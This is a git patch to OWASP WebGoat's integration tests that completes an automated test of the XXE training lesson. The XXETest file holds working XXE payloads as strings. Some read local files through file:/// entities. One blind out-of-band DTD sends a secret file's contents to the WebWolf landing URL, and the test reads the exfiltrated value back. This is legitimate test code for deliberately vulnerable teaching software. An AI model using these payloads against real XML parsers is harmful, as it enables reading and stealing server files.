From 30d38f9b56b27b707910733ec8f6f8a156a03b95 Mon Sep 17 00:00:00 2001
From: Rene Zubcevic <git@zubcevic.com>
Date: Wed, 18 Sep 2019 16:10:52 +0200
Subject: [PATCH] completed test

---
 .../org/owasp/webgoat/IntegrationTest.java    | 20 +++++-
 .../test/java/org/owasp/webgoat/XXETest.java  | 62 +++++++++++--------
 .../resources/application-inttest.properties  |  8 ++-
 3 files changed, 60 insertions(+), 30 deletions(-)

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
index d896b1c80..4089e3b77 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
@@ -3,6 +3,7 @@ package org.owasp.webgoat;
 import io.restassured.RestAssured;
 import io.restassured.config.RestAssuredConfig;
 import io.restassured.config.SSLConfig;
+import io.restassured.http.ContentType;
 import lombok.Getter;
 import org.hamcrest.CoreMatchers;
 import org.junit.After;
@@ -210,7 +211,8 @@ public abstract class IntegrationTest {
                 .config(restConfig)
                 .cookie("JSESSIONID", getWebGoatCookie())
                 .get(url("service/lessonoverview.mvc"))
-                .then()
+                .then()                
+                .log().all()
                 .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
 
         Assert.assertThat(RestAssured.given()
@@ -222,4 +224,20 @@ public abstract class IntegrationTest {
                 .statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix)));
 
     }
+
+    public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
+        Assert.assertThat(
+                RestAssured.given()
+                        .when()
+                        .config(restConfig)
+                        .contentType(contentType)
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .body(body)
+                        .post(url)
+                        .then()
+                        .statusCode(200)
+                        .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+    }
+    
 }
+
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
index ab6e3350c..86f2eb56c 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@@ -5,8 +5,6 @@ import java.nio.file.Files;
 import java.nio.file.Path;
 import java.nio.file.Paths;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.Assert;
 import org.junit.Test;
 
 import io.restassured.RestAssured;
@@ -16,7 +14,7 @@ public class XXETest extends IntegrationTest {
 
     private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
     private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
-    private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file://SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURLlanding?text=%file;'>\">%all;";
+    private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
     private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
     
     private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
@@ -28,15 +26,33 @@ public class XXETest extends IntegrationTest {
         startLesson("XXE");
         
         checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
+        
         checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
-        Path webWolfFilePath = Paths.get(webwolfFileDir);
+        
+        
+        
+        checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,"<comment><text>"+getSecret()+"</text></comment>",true );
+        
+        checkResults("xxe/");
+    
+    }
+    
+    /**
+     * This performs the steps of the exercise before the secret can be committed in the final step.
+     * @return
+     * @throws IOException
+     */
+    private String getSecret() throws IOException {
+    	
+    	//remove any left over DTD
+    	Path webWolfFilePath = Paths.get(webwolfFileDir);
         if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
-        	System.out.println("delete file");
         	Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
         }
         String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
-        String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile);
-        System.out.println(dtd7String);
+        String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
+        
+        //upload DTD
         RestAssured.given()
         .when()
         .config(restConfig)
@@ -46,28 +62,20 @@ public class XXETest extends IntegrationTest {
         .then()
         .extract().response().getBody().asString();
         
-        
-        String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser());
-        System.out.println(xxe7String);
+        //upload attack
+        String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
         checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
         
-        //checkResults("/XXE/");
-    
-    }
-    
-    public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
-        Assert.assertThat(
-                RestAssured.given()
-                        .when()
-                        .config(restConfig)
-                        .contentType(contentType)
-                        .cookie("JSESSIONID", getWebGoatCookie())
-                        .body(body)
-                        .post(url)
-                        .then()
-                        .log().all()
-                        .statusCode(200)
-                        .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+        //read results from WebWolf
+        String result = RestAssured.given()
+        .when()
+        .config(restConfig)
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .get(webWolfUrl("/WebWolf/requests"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
+        return result;
     }
     
 }
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
index 9c388c7ca..4286e914f 100644
--- a/webgoat-integration-tests/src/test/resources/application-inttest.properties
+++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties
@@ -1,6 +1,10 @@
+#In order to run tests a known temp directory is preferred
+#that is why these values are used
+
 webgoat.user.directory=${user.dir}/target/.webgoat
 webgoat.server.directory=${user.dir}/target/.webgoat
-
 webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
 
-spring.jpa.hibernate.ddl-auto=create-drop
\ No newline at end of file
+#database will get deleted for every mvn clean install
+#as these extra properties are read by WebGoat and WebWolf the drop of the tables 
+#was not helpful. 
\ No newline at end of file